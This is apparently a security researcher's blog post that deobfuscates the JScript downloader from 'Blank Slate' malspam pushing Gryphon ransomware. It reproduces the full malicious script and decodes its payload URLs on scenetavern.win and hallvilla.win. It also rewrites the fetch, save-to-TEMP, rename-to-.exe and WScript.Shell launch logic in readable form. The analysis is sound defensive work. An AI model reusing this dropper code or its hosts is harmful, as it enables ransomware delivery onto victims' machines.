2017-08-04 Quick Post – Deobfuscating the Javascript from “Blank Slate” malspam Pushing Gryphon Ransomware (A BTCware variant)

Just a quick one for today. I saw Brad’s tweet about a sample of Blank Slate malspam and decided to see if I could find some today while at work. Thankfully the email filters did their job and all of them were blocked. Brad also blogged about this over on his blog which you can read about here. Instead of breaking down the traffic and such (since he already did an excellent job at that and since the callbacks are exactly the same as his), I figured that I would try my hand at deobfuscating the Javascript. Some of it I got and understand, while other parts of the script I am not sure about since there are parameters that are being passed around that I do not see being declared.

Below is the original Javascript code. My goal was to try and figure out 1) what were the URLs involved in this, 2) where did it save the file to, and 3) what was the name of the file.

 
// Analyst note: stream-fill helper assembled at runtime with the Function constructor.
// Called as OYVVwnOtP(data, stream): opens the stream, sets Type = 1 (binary for an
// ADODB.Stream), writes the data and rewinds Position to 0.
// NOTE(review): building it from strings presumably keeps the Open/Write calls away
// from simple static pattern matching — inferred, not shown by the sample.
var OYVVwnOtP = new Function('grXPRbLhz, FXv', 'FXv.Open(); FXv.Type = 1;  FXv.Write(grXPRbLhz); FXv.Position = 0;');

// Analyst note: writes a downloaded buffer to disk.
//   grXPRbLhz   - the data to write (the HTTP response body in this sample)
//   LrbxZvcrBPR - destination path
// The ADODB.Stream object is created inside eval(), filled by OYVVwnOtP, then saved
// with SaveToFile(path, 2) (2 = overwrite an existing file) and closed.
// Always returns true; any failure surfaces as an exception for the caller to catch.
function JBDmDZBuEB(grXPRbLhz, LrbxZvcrBPR){
	eval('var FXv = new ActiveXObject("ADODB.Stream");');
  OYVVwnOtP(grXPRbLhz, FXv); 
   FXv.SaveToFile(LrbxZvcrBPR, 2);
   FXv.Close();
   return true;
}

// Analyst note: error shim. Invokes the function it is given with (null, true),
// i.e. "no data, failure" in the callback convention used throughout the script.
function ZHBCBwZoAeg(iHrrDmvJ){
	return iHrrDmvJ(null, true);
}

// Analyst note: "save to disk" stage.
//   grXPRbLhz - downloaded data
//   NeWBrXq   - callback invoked as (path, false) on success or (null, true) on failure
// Asks kkjtVXmjFGm() for a destination path, writes the data there with JBDmDZBuEB,
// and hands the path to the callback.
// The WScript.Echo('JBtVVL') branch only runs if JBDmDZBuEB returns a falsy value;
// in this listing JBDmDZBuEB either returns true or throws.
// In the catch path the inner function forwards only its first argument, so the
// callback receives (null) without an error flag, and its result is not returned.
function YbfHyzPEx(grXPRbLhz, NeWBrXq){
 try{
  var LrbxZvcrBPR = kkjtVXmjFGm();
  if (LrbxZvcrBPR){
var PtboGJ = JBDmDZBuEB(grXPRbLhz, LrbxZvcrBPR); 
   if(!PtboGJ){
	  WScript.Echo('JBtVVL'); 
   }
   return NeWBrXq(LrbxZvcrBPR, false);
  }else {
   return NeWBrXq(null, true);
  }
 }catch (error){
  ZHBCBwZoAeg(function(iHrrDmvJ){
    return NeWBrXq(iHrrDmvJ);
});
 }
}

// Analyst note: download stage with a five-deep fallback chain.
//   uhbWZftIiwx - callback invoked as (responseBody, false) on the first successful
//                 fetch, or (null, true) once every URL has failed
// Each URL literal has a junk delimiter inserted between every character;
// .split(delimiter).join('') strips it at runtime. The first literal decodes to a
// URL on scenetavern.win, the other four all decode to the same hallvilla.win URL.
// Each URL is requested through zyNFNhDt and the next one is tried only when the
// previous request reported failure.
function BfXn(uhbWZftIiwx){
try{
 var cLdawRT = 'h!.f#it%%t!.f#it%%t!.f#it%%p!.f#it%%:!.f#it%%/!.f#it%%/!.f#it%%s!.f#it%%c!.f#it%%e!.f#it%%n!.f#it%%e!.f#it%%t!.f#it%%a!.f#it%%v!.f#it%%e!.f#it%%r!.f#it%%n!.f#it%%.!.f#it%%w!.f#it%%i!.f#it%%n!.f#it%%/!.f#it%%s!.f#it%%u!.f#it%%p!.f#it%%p!.f#it%%o!.f#it%%r!.f#it%%t!.f#it%%.!.f#it%%p!.f#it%%h!.f#it%%p!.f#it%%?!.f#it%%f!.f#it%%=!.f#it%%1!.f#it%%.!.f#it%%d!.f#it%%a!.f#it%%t'.split('!.f#it%%').join('');
   zyNFNhDt(cLdawRT, function(rRqDEZL, XNrxa) {
	if (!XNrxa){
    return uhbWZftIiwx(rRqDEZL, false);
 }else{
var An = 'ho,lmiyXBToUPto,lmiyXBToUPto,lmiyXBToUPpo,lmiyXBToUP:o,lmiyXBToUP/o,lmiyXBToUP/o,lmiyXBToUPho,lmiyXBToUPao,lmiyXBToUPlo,lmiyXBToUPlo,lmiyXBToUPvo,lmiyXBToUPio,lmiyXBToUPlo,lmiyXBToUPlo,lmiyXBToUPao,lmiyXBToUP.o,lmiyXBToUPwo,lmiyXBToUPio,lmiyXBToUPno,lmiyXBToUP/o,lmiyXBToUPso,lmiyXBToUPuo,lmiyXBToUPpo,lmiyXBToUPpo,lmiyXBToUPoo,lmiyXBToUPro,lmiyXBToUPto,lmiyXBToUP.o,lmiyXBToUPpo,lmiyXBToUPho,lmiyXBToUPpo,lmiyXBToUP?o,lmiyXBToUPfo,lmiyXBToUP=o,lmiyXBToUP1o,lmiyXBToUP.o,lmiyXBToUPdo,lmiyXBToUPao,lmiyXBToUPt'.split('o,lmiyXBToUP').join('');
          zyNFNhDt(An, function(rRqDEZL, XNrxa) {
	          if (!XNrxa){
                 return uhbWZftIiwx(rRqDEZL, false);
	          }else{
 var LeBwYRrA = 'hudraUtudraUtudraUpudraU:udraU/udraU/udraUhudraUaudraUludraUludraUvudraUiudraUludraUludraUaudraU.udraUwudraUiudraUnudraU/udraUsudraUuudraUpudraUpudraUoudraUrudraUtudraU.udraUpudraUhudraUpudraU?udraUfudraU=udraU1udraU.udraUdudraUaudraUt'.split('udraU').join('');
	               zyNFNhDt(LeBwYRrA, function(rRqDEZL, XNrxa) {
	                 if (!XNrxa){
                        return uhbWZftIiwx(rRqDEZL, false);
	                 }else{
var fDCLYoAfB = 'h.%VhouJXxexz.Qt.%VhouJXxexz.Qt.%VhouJXxexz.Qp.%VhouJXxexz.Q:.%VhouJXxexz.Q/.%VhouJXxexz.Q/.%VhouJXxexz.Qh.%VhouJXxexz.Qa.%VhouJXxexz.Ql.%VhouJXxexz.Ql.%VhouJXxexz.Qv.%VhouJXxexz.Qi.%VhouJXxexz.Ql.%VhouJXxexz.Ql.%VhouJXxexz.Qa.%VhouJXxexz.Q..%VhouJXxexz.Qw.%VhouJXxexz.Qi.%VhouJXxexz.Qn.%VhouJXxexz.Q/.%VhouJXxexz.Qs.%VhouJXxexz.Qu.%VhouJXxexz.Qp.%VhouJXxexz.Qp.%VhouJXxexz.Qo.%VhouJXxexz.Qr.%VhouJXxexz.Qt.%VhouJXxexz.Q..%VhouJXxexz.Qp.%VhouJXxexz.Qh.%VhouJXxexz.Qp.%VhouJXxexz.Q?.%VhouJXxexz.Qf.%VhouJXxexz.Q=.%VhouJXxexz.Q1.%VhouJXxexz.Q..%VhouJXxexz.Qd.%VhouJXxexz.Qa.%VhouJXxexz.Qt'.split('.%VhouJXxexz.Q').join('');
	                       zyNFNhDt(fDCLYoAfB, function(rRqDEZL, XNrxa) {
	                          if (!XNrxa){
                                 return uhbWZftIiwx(rRqDEZL, false);
	                          }else{
	 var ZdDFB = 'h*UTE%pyNccJCzNt*UTE%pyNccJCzNt*UTE%pyNccJCzNp*UTE%pyNccJCzN:*UTE%pyNccJCzN/*UTE%pyNccJCzN/*UTE%pyNccJCzNh*UTE%pyNccJCzNa*UTE%pyNccJCzNl*UTE%pyNccJCzNl*UTE%pyNccJCzNv*UTE%pyNccJCzNi*UTE%pyNccJCzNl*UTE%pyNccJCzNl*UTE%pyNccJCzNa*UTE%pyNccJCzN.*UTE%pyNccJCzNw*UTE%pyNccJCzNi*UTE%pyNccJCzNn*UTE%pyNccJCzN/*UTE%pyNccJCzNs*UTE%pyNccJCzNu*UTE%pyNccJCzNp*UTE%pyNccJCzNp*UTE%pyNccJCzNo*UTE%pyNccJCzNr*UTE%pyNccJCzNt*UTE%pyNccJCzN.*UTE%pyNccJCzNp*UTE%pyNccJCzNh*UTE%pyNccJCzNp*UTE%pyNccJCzN?*UTE%pyNccJCzNf*UTE%pyNccJCzN=*UTE%pyNccJCzN1*UTE%pyNccJCzN.*UTE%pyNccJCzNd*UTE%pyNccJCzNa*UTE%pyNccJCzNt'.split('*UTE%pyNccJCzN').join('');
	                                 zyNFNhDt(ZdDFB, function(rRqDEZL, XNrxa) {
	                                 if (!XNrxa){
                                        return uhbWZftIiwx(rRqDEZL, false);
	                                 }else{
	                                      return uhbWZftIiwx(null, true);
	                                 }
		                         });
	                          }
		                  });
	                 }
		         });
	           }
	         });
	}
  });
}catch (error){
	 WScript.Echo(error);
  // NOTE(review): `callback` is not declared anywhere in this listing (the parameter
  // is uhbWZftIiwx), so reaching this line would itself raise an error.
  return callback(null, true);
 }
}

// Analyst note: request helper assembled at runtime with the Function constructor.
// Called as UuWLYb(xhr, url, 'G', 'E', 'T'): the three single-letter arguments are
// concatenated into the verb "GET", then xhr.open(verb, url, false) and xhr.send()
// run. The third open() argument false makes the request synchronous.
var UuWLYb = new Function('jqOgH, gKcsgoe, wXctwooFWY, bjxBDp, LPVLBzsXfZ', "jqOgH.open(wXctwooFWY+bjxBDp+LPVLBzsXfZ, gKcsgoe, false); jqOgH.send();");

// Analyst note: single HTTP fetch.
//   gKcsgoe - URL to request
//   oNec    - callback invoked as (ResponseBody, false) when the status is 200,
//             otherwise (null, true); exceptions are also reported as (null, true)
// One MSXML2.XMLHTTP object is created and passed to UuWLYb, which issues the GET.
// The verb is split into 'G', 'E', 'T' so the literal "GET" never appears in the file.
function zyNFNhDt(gKcsgoe, oNec){
 try{
var wXctwooFWY = 'G', bjxBDp = 'E', LPVLBzsXfZ='T';
  var jqOgH = new ActiveXObject("MSXML2.XMLHTTP");
  UuWLYb(jqOgH, gKcsgoe, wXctwooFWY, bjxBDp, LPVLBzsXfZ);
  if (jqOgH.status == 200) {
   return oNec(jqOgH.ResponseBody, false);
  }else{
   return oNec(null, true);}
 }catch (error){
   return oNec(null, true);
 }
}
// Analyst note: returns Math.random() rendered as a string in radix sbzyF.
// The only caller in this listing passes 36, giving "0." followed by [0-9a-z] characters.
function XfVTJpem(sbzyF){
	var NGYTpk = Math.random().toString(sbzyF);
	return NGYTpk;
}
// Analyst note: builds the drop path; returns the path string, or false on any error.
// The arithmetic folds to constants: sbzyF = 36, NCN = 2, dGo = 9.
// File name = characters 2..10 of the base-36 random string (skipping the leading
// "0.") plus ".jpeg"; directory = GetSpecialFolder(2), the temporary folder.
// Both eval() calls only declare local variables; they hide the assignments from a
// plain read of the function body.
function kkjtVXmjFGm(){
  try{
	var vmKSEe = new ActiveXObject('Scripting.FileSystemObject');
   var hrqrpe = "\\";
   var sbzyF = 60 - 30 + 6, NCN = 200 - 200 + 2, dGo =  300 - 300 + 9, FxXqfgl = ".jpeg";
   eval('var NGYTpk = XfVTJpem(sbzyF);');
   var WgAnQ  = NGYTpk.substr(NCN, dGo) + FxXqfgl;
   var QlKC = hrqrpe + WgAnQ;
   eval('var gdSzth = vmKSEe.GetSpecialFolder(2) + QlKC;')
   return gdSzth;
  }catch (error){
   return false;
  }
}

// Analyst note: copies the dropped file to an executable name.
//   weYEnghOO - path of the saved ".jpeg" file
//   pjueW     - callback that receives the new path
// '.eLgwbscAmuvxe'.replace('LgwbscAmuv','') evaluates to '.exe', so the copy target
// is the same path with ".jpeg" swapped for ".exe". The original .jpeg is left in place.
// Returns the callback's result, or null if anything throws.
function wP(weYEnghOO, pjueW){
	  try{
   var gxbzl, FkZHVBSIleW = '.eLgwbscAmuvxe';
   gxbzl = new ActiveXObject('Scripting.FileSystemObject');
   gxbzl.CopyFile(weYEnghOO, weYEnghOO.replace('.jpeg','') + FkZHVBSIleW.replace('LgwbscAmuv',''));
   return pjueW(weYEnghOO.replace('.jpeg','') + FkZHVBSIleW.replace('LgwbscAmuv',''));
	  }catch(e){
		  return null;
	  }
}
// Analyst note: script entry point. Chains the three stages:
//   BfXn       -> download (DA is the response body)
//   YbfHyzPEx  -> save to disk (fbJE is the saved path)
//   sXlXzdxRV  -> copy to .exe and launch
// Each stage runs only if the previous one reported no error; exceptions from the
// launch stage are silently discarded. sXlXzdxRV is declared further down the file.
BfXn(function (DA, error) {
  if (!error){
   YbfHyzPEx(DA, function (fbJE, error) {
    if (!error){
     try{
		sXlXzdxRV(fbJE);
     }catch (error) {}
    }
   });
  }
});

// Analyst note: launch primitive. aLXV is a string of source code that is pasted
// into eval() to create the object WJ; WJ.Run(bkHS) is then called with the path.
// In this sample the only aLXV value that reaches here is
// 'new ActiveXObject("WScript.Shell")' (see the 'cript' check in VJfO).
function IvnSs(aLXV, bkHS){
 eval('var WJ = '+ aLXV+';  WJ.Run(bkHS);');
}

// Analyst note: pass-through wrapper around IvnSs; adds one level of indirection only.
;function xvH(aLXV, bkHS){
 IvnSs(aLXV, bkHS);
}
 
// Analyst note: second launch primitive, without eval. Creates a WScript.Shell
// object directly and calls Run() on the path it is given.
function sHmTwEdTKus(EhUQRAnFKJ){
 var fRsxWxzjms = "WScript.Shell";
 var WJ = new ActiveXObject(fRsxWxzjms);  WJ.Run(EhUQRAnFKJ);
}

// Analyst note: pass-through wrapper around xvH (which in turn calls IvnSs).
function EGggPCw(aLXV, bkHS){
xvH(aLXV, bkHS)
}

// Analyst note: returns one element of the array CdBxL chosen with Math.random().
function VfjXQnOJOn(CdBxL){
return CdBxL[Math.floor((Math.random()*CdBxL.length))];
}

// Analyst note: pass-through wrapper around sHmTwEdTKus (the direct WScript.Shell launcher).
function nWzBNEcR(EhUQRAnFKJ){
			sHmTwEdTKus(EhUQRAnFKJ);
}
	  // Analyst note: conditional launch.
	  //   BmWRBjy - path of the saved ".jpeg" file
	  //   aLXV    - the code string chosen in sXlXzdxRV
	  // If aLXV contains 'cript' (~indexOf is non-zero when the substring is found),
	  // the file is copied to ".exe" via wP and launched through EGggPCw, once, and the
	  // function returns 1. Otherwise the loop spins ten times doing nothing and the
	  // function returns 0. The inner while loop executes exactly one time.
	  function  VJfO(BmWRBjy, aLXV){
		  var LPVLBzsXfZ = 0;
	  for (var i = 0; i < 10; i++) {
		  var GtbwmcRSqEG =  aLXV;
		  if(~GtbwmcRSqEG.indexOf('cript')){
		      LPVLBzsXfZ = 1;
            var ndsU = 1;
            while (ndsU < 2) {
			  wP(BmWRBjy, function (sedWqVUi){
	              EGggPCw(aLXV, sedWqVUi);
			  });
            ndsU++;
            }
		      break;
		  }
	    }
		return LPVLBzsXfZ;
	  }

// Analyst note: launch stage; `path` is the saved ".jpeg" file.
// aLXV is picked at random from three strings, of which only
// 'new ActiveXObject("WScript.Shell")' contains 'cript' and is usable by VJfO.
//  - If that string was picked, VJfO launches the copied .exe and returns 1; the
//    do/while body still runs once, so VJfO (copy + Run) is invoked a second time.
//  - If a decoy string was picked, VJfO returns 0 and the loop repeats until the
//    counter npAEAofTSq exceeds 1000054, after which the file is copied and launched
//    through the direct WScript.Shell path (wP -> nWzBNEcR).
// NOTE(review): the long counting loop looks like a delay before execution — inferred
// from the code shape, not confirmed by the post.
// PE and OB are declared but never used.
function sXlXzdxRV(path){
	  var PE = null, OB = null;
	  
	  var  aLXV = VfjXQnOJOn(['return ds','sdfd', 'new ActiveXObject("WScript.Shell")']);
	   var  npAEAofTSq = 0;
	   function  rIiZQV(){
		    VJfO(path, aLXV);
		    npAEAofTSq++;
		   if( npAEAofTSq >1000054){
			   wP(path, function (nVA){
	                         nWzBNEcR(nVA)
			   });
			   return true;
		   }
		   return false;
	   }
	   var knWVRRPCS =  VJfO(path, aLXV);
	   
	   var i = 0;	   
	   do {
           i = knWVRRPCS;
           var wgR =  rIiZQV();	
		   if(wgR){
			   break;	
		   }
       } while (i < 1);
}

Basically I started off just trying to see any kind of patterns or anything that stood out. Looking through the code, the first things that stood out were the following lines:

// Analyst note: each literal below is a URL with the same junk delimiter inserted
// between every pair of characters. split(delimiter) breaks the string at each
// delimiter and join('') glues the single characters back together.
var cLdawRT = 'h!.f#it%%t!.f#it%%t!.f#it%%p!.f#it%%:!.f#it%%/!.f#it%%/!.f#it%%s!.f#it%%c!.f#it%%e!.f#it%%n!.f#it%%e!.f#it%%t!.f#it%%a!.f#it%%v!.f#it%%e!.f#it%%r!.f#it%%n!.f#it%%.!.f#it%%w!.f#it%%i!.f#it%%n!.f#it%%/!.f#it%%s!.f#it%%u!.f#it%%p!.f#it%%p!.f#it%%o!.f#it%%r!.f#it%%t!.f#it%%.!.f#it%%p!.f#it%%h!.f#it%%p!.f#it%%?!.f#it%%f!.f#it%%=!.f#it%%1!.f#it%%.!.f#it%%d!.f#it%%a!.f#it%%t'.split('!.f#it%%').join('');

var An = 'ho,lmiyXBToUPto,lmiyXBToUPto,lmiyXBToUPpo,lmiyXBToUP:o,lmiyXBToUP/o,lmiyXBToUP/o,lmiyXBToUPho,lmiyXBToUPao,lmiyXBToUPlo,lmiyXBToUPlo,lmiyXBToUPvo,lmiyXBToUPio,lmiyXBToUPlo,lmiyXBToUPlo,lmiyXBToUPao,lmiyXBToUP.o,lmiyXBToUPwo,lmiyXBToUPio,lmiyXBToUPno,lmiyXBToUP/o,lmiyXBToUPso,lmiyXBToUPuo,lmiyXBToUPpo,lmiyXBToUPpo,lmiyXBToUPoo,lmiyXBToUPro,lmiyXBToUPto,lmiyXBToUP.o,lmiyXBToUPpo,lmiyXBToUPho,lmiyXBToUPpo,lmiyXBToUP?o,lmiyXBToUPfo,lmiyXBToUP=o,lmiyXBToUP1o,lmiyXBToUP.o,lmiyXBToUPdo,lmiyXBToUPao,lmiyXBToUPt'.split('o,lmiyXBToUP').join('');

var LeBwYRrA = 'hudraUtudraUtudraUpudraU:udraU/udraU/udraUhudraUaudraUludraUludraUvudraUiudraUludraUludraUaudraU.udraUwudraUiudraUnudraU/udraUsudraUuudraUpudraUpudraUoudraUrudraUtudraU.udraUpudraUhudraUpudraU?udraUfudraU=udraU1udraU.udraUdudraUaudraUt'.split('udraU').join('');

var fDCLYoAfB = 'h.%VhouJXxexz.Qt.%VhouJXxexz.Qt.%VhouJXxexz.Qp.%VhouJXxexz.Q:.%VhouJXxexz.Q/.%VhouJXxexz.Q/.%VhouJXxexz.Qh.%VhouJXxexz.Qa.%VhouJXxexz.Ql.%VhouJXxexz.Ql.%VhouJXxexz.Qv.%VhouJXxexz.Qi.%VhouJXxexz.Ql.%VhouJXxexz.Ql.%VhouJXxexz.Qa.%VhouJXxexz.Q..%VhouJXxexz.Qw.%VhouJXxexz.Qi.%VhouJXxexz.Qn.%VhouJXxexz.Q/.%VhouJXxexz.Qs.%VhouJXxexz.Qu.%VhouJXxexz.Qp.%VhouJXxexz.Qp.%VhouJXxexz.Qo.%VhouJXxexz.Qr.%VhouJXxexz.Qt.%VhouJXxexz.Q..%VhouJXxexz.Qp.%VhouJXxexz.Qh.%VhouJXxexz.Qp.%VhouJXxexz.Q?.%VhouJXxexz.Qf.%VhouJXxexz.Q=.%VhouJXxexz.Q1.%VhouJXxexz.Q..%VhouJXxexz.Qd.%VhouJXxexz.Qa.%VhouJXxexz.Qt'.split('.%VhouJXxexz.Q').join('');

var ZdDFB = 'h*UTE%pyNccJCzNt*UTE%pyNccJCzNt*UTE%pyNccJCzNp*UTE%pyNccJCzN:*UTE%pyNccJCzN/*UTE%pyNccJCzN/*UTE%pyNccJCzNh*UTE%pyNccJCzNa*UTE%pyNccJCzNl*UTE%pyNccJCzNl*UTE%pyNccJCzNv*UTE%pyNccJCzNi*UTE%pyNccJCzNl*UTE%pyNccJCzNl*UTE%pyNccJCzNa*UTE%pyNccJCzN.*UTE%pyNccJCzNw*UTE%pyNccJCzNi*UTE%pyNccJCzNn*UTE%pyNccJCzN/*UTE%pyNccJCzNs*UTE%pyNccJCzNu*UTE%pyNccJCzNp*UTE%pyNccJCzNp*UTE%pyNccJCzNo*UTE%pyNccJCzNr*UTE%pyNccJCzNt*UTE%pyNccJCzN.*UTE%pyNccJCzNp*UTE%pyNccJCzNh*UTE%pyNccJCzNp*UTE%pyNccJCzN?*UTE%pyNccJCzNf*UTE%pyNccJCzN=*UTE%pyNccJCzN1*UTE%pyNccJCzN.*UTE%pyNccJCzNd*UTE%pyNccJCzNa*UTE%pyNccJCzNt'.split('*UTE%pyNccJCzN').join('');

So this is pretty simple. There is a repeated pattern in each of the above lines that gets “cut” out by the split() call at the end of the line, with join('') gluing the remaining characters back together. Once you remove those characters, you are left with the following lines:

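// Decoded URL literals, in the order the script tries them. The junk delimiter has
// been removed from each string; the trailing .split(...).join('') is kept from the
// sample but is now a no-op because the delimiter no longer occurs in the text.
// The four fallback entries all decode to the same hallvilla.win address.
var cLdawRT = 'http://scenetavern.win/support.php?f=1.dat'.split('!.f#it%%').join('');
var An = 'http://hallvilla.win/support.php?f=1.dat'.split('o,lmiyXBToUP').join('');
var LeBwYRrA = 'http://hallvilla.win/support.php?f=1.dat'.split('udraU').join('');
var fDCLYoAfB = 'http://hallvilla.win/support.php?f=1.dat'.split('.%VhouJXxexz.Q').join('');
var ZdDFB = 'http://hallvilla.win/support.php?f=1.dat'.split('*UTE%pyNccJCzN').join('');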

Next, I saw the part of the code that is responsible for the GET request. This stood out because of the way the “GET” characters were assigned to the different variables.

Obfuscated
----------
// Analyst note: helper built with the Function constructor. Its last three
// parameters are concatenated to form the HTTP verb passed to open(); the third
// open() argument false makes the request synchronous.
var UuWLYb = new Function('jqOgH, gKcsgoe, wXctwooFWY, bjxBDp, LPVLBzsXfZ', "jqOgH.open(wXctwooFWY+bjxBDp+LPVLBzsXfZ, gKcsgoe, false); jqOgH.send();");

// Analyst note: fetches the URL gKcsgoe with one MSXML2.XMLHTTP object.
// 'G', 'E' and 'T' are kept in separate variables so the verb is only assembled
// inside UuWLYb. The callback oNec gets (ResponseBody, false) on HTTP 200 and
// (null, true) on any other status or on an exception.
function zyNFNhDt(gKcsgoe, oNec){
 try{
var wXctwooFWY = 'G', bjxBDp = 'E', LPVLBzsXfZ='T';
  var jqOgH = new ActiveXObject("MSXML2.XMLHTTP");
  UuWLYb(jqOgH, gKcsgoe, wXctwooFWY, bjxBDp, LPVLBzsXfZ);
  if (jqOgH.status == 200) {
   return oNec(jqOgH.ResponseBody, false);
  }else{
   return oNec(null, true);}
 }catch (error){
   return oNec(null, true);
 }
}

Deobfuscated
------------
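// Deobfuscated request helper: the 'G' + 'E' + 'T' concatenation is folded into the
// literal verb, and the Function-constructor wrapper is written as a plain function.
// The third open() argument false makes the request synchronous.
var UuWLYb = function (jqOgH, gKcsgoe) {
  jqOgH.open('GET', gKcsgoe, false);
  jqOgH.send();
};

// Deobfuscated fetch routine.
//   gKcsgoe - URL to request
//   oNec    - callback: (ResponseBody, false) on HTTP 200, (null, true) otherwise
// A single MSXML2.XMLHTTP object (jqOgH) is created and reused for open, send,
// status and ResponseBody; substituting the constructor call at every use would
// wrongly suggest a fresh object each time and is not valid JavaScript.
function zyNFNhDt(gKcsgoe, oNec){
  try {
    var jqOgH = new ActiveXObject("MSXML2.XMLHTTP");
    UuWLYb(jqOgH, gKcsgoe);
    if (jqOgH.status == 200) {
      return oNec(jqOgH.ResponseBody, false);
    } else {
      return oNec(null, true);
    }
  } catch (error) {
    // Any COM or network exception is reported as a plain failure.
    return oNec(null, true);
  }
}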

From here the next three functions deal with the naming of the file (which looks to be random) and where it is downloaded to (SpecialFolder 2 is the TEMP folder on the system). The interesting part here is that the code, from what I can tell, is using a base 36 numbering system, as seen in the piece of code “var NGYTpk = Math.random().toString(36).” That random string is what the file name is built from: there is a substr() method that starts at the third character of the string (skipping the leading “0.”) and goes 9 characters. This is seen via the piece of code “.substr(2, 9).” The file then, from what I can tell, gets copied while also dropping the “.jpeg” file extension (since the replace statement is using an empty string as the replacement) and also proceeds to remove “LgwbscAmuv” from the value found in the variable “FkZHVBSIleW” (‘.eLgwbscAmuvxe’), which leaves just “.exe.”

Obfuscated
----------
// Analyst note: returns Math.random() converted to a string in radix sbzyF.
function XfVTJpem(sbzyF){
	var NGYTpk = Math.random().toString(sbzyF);
	return NGYTpk;
}
// Analyst note: returns the path the download is saved to, or false on error.
// The constants fold to sbzyF = 36, NCN = 2, dGo = 9, so the name is
// substr(2, 9) of a base-36 random string plus ".jpeg", placed under
// GetSpecialFolder(2) (the temporary folder). The eval() calls only declare locals.
function kkjtVXmjFGm(){
  try{
	var vmKSEe = new ActiveXObject('Scripting.FileSystemObject');
   var hrqrpe = "\\";
   var sbzyF = 60 - 30 + 6, NCN = 200 - 200 + 2, dGo =  300 - 300 + 9, FxXqfgl = ".jpeg";
   eval('var NGYTpk = XfVTJpem(sbzyF);');
   var WgAnQ  = NGYTpk.substr(NCN, dGo) + FxXqfgl;
   var QlKC = hrqrpe + WgAnQ;
   eval('var gdSzth = vmKSEe.GetSpecialFolder(2) + QlKC;')
   return gdSzth;
  }catch (error){
   return false;
  }
}

// Analyst note: copies the file at weYEnghOO to the same path with ".jpeg" removed
// and '.exe' appended ('.eLgwbscAmuvxe' minus 'LgwbscAmuv'), then passes the new
// path to the callback pjueW. Returns null if anything throws.
function wP(weYEnghOO, pjueW){
	  try{
   var gxbzl, FkZHVBSIleW = '.eLgwbscAmuvxe';
   gxbzl = new ActiveXObject('Scripting.FileSystemObject');
   gxbzl.CopyFile(weYEnghOO, weYEnghOO.replace('.jpeg','') + FkZHVBSIleW.replace('LgwbscAmuv',''));
   return pjueW(weYEnghOO.replace('.jpeg','') + FkZHVBSIleW.replace('LgwbscAmuv',''));
	  }catch(e){
		  return null;
	  }
}

Deobfuscated
------------
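// Deobfuscated file-naming and copy helpers. Constants are folded and the eval()
// wrappers removed; identifiers are kept so they still match the obfuscated listing.

// Returns Math.random() as a string in radix sbzyF. The only caller passes 36,
// so the result is "0." followed by characters from [0-9a-z].
function XfVTJpem(sbzyF){
  var NGYTpk = Math.random().toString(sbzyF);
  return NGYTpk;
}

// Builds the path the download is written to; returns false on any error.
// The random string is generated ONCE and reused: name = NGYTpk.substr(2, 9)
// (skips the leading "0.") + ".jpeg", under GetSpecialFolder(2), the temp folder.
function kkjtVXmjFGm(){
  try {
    var vmKSEe = new ActiveXObject('Scripting.FileSystemObject');
    var NGYTpk = XfVTJpem(36);
    var WgAnQ = NGYTpk.substr(2, 9) + ".jpeg";
    var gdSzth = vmKSEe.GetSpecialFolder(2) + "\\" + WgAnQ;
    return gdSzth;
  } catch (error) {
    return false;
  }
}

// Copies the saved ".jpeg" to the same path ending in ".exe" and passes the new
// path to the callback pjueW. '.eLgwbscAmuvxe'.replace('LgwbscAmuv','') is '.exe'.
// Returns the callback's result, or null if anything throws.
function wP(weYEnghOO, pjueW){
  try {
    var gxbzl = new ActiveXObject('Scripting.FileSystemObject');
    var exePath = weYEnghOO.replace('.jpeg','') + '.exe';
    gxbzl.CopyFile(weYEnghOO, exePath);
    return pjueW(exePath);
  } catch (e) {
    return null;
  }
}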

From there, there are references to “WScript.Shell” and also a “Run” command, which is most likely how the malware starts once the file has been downloaded.
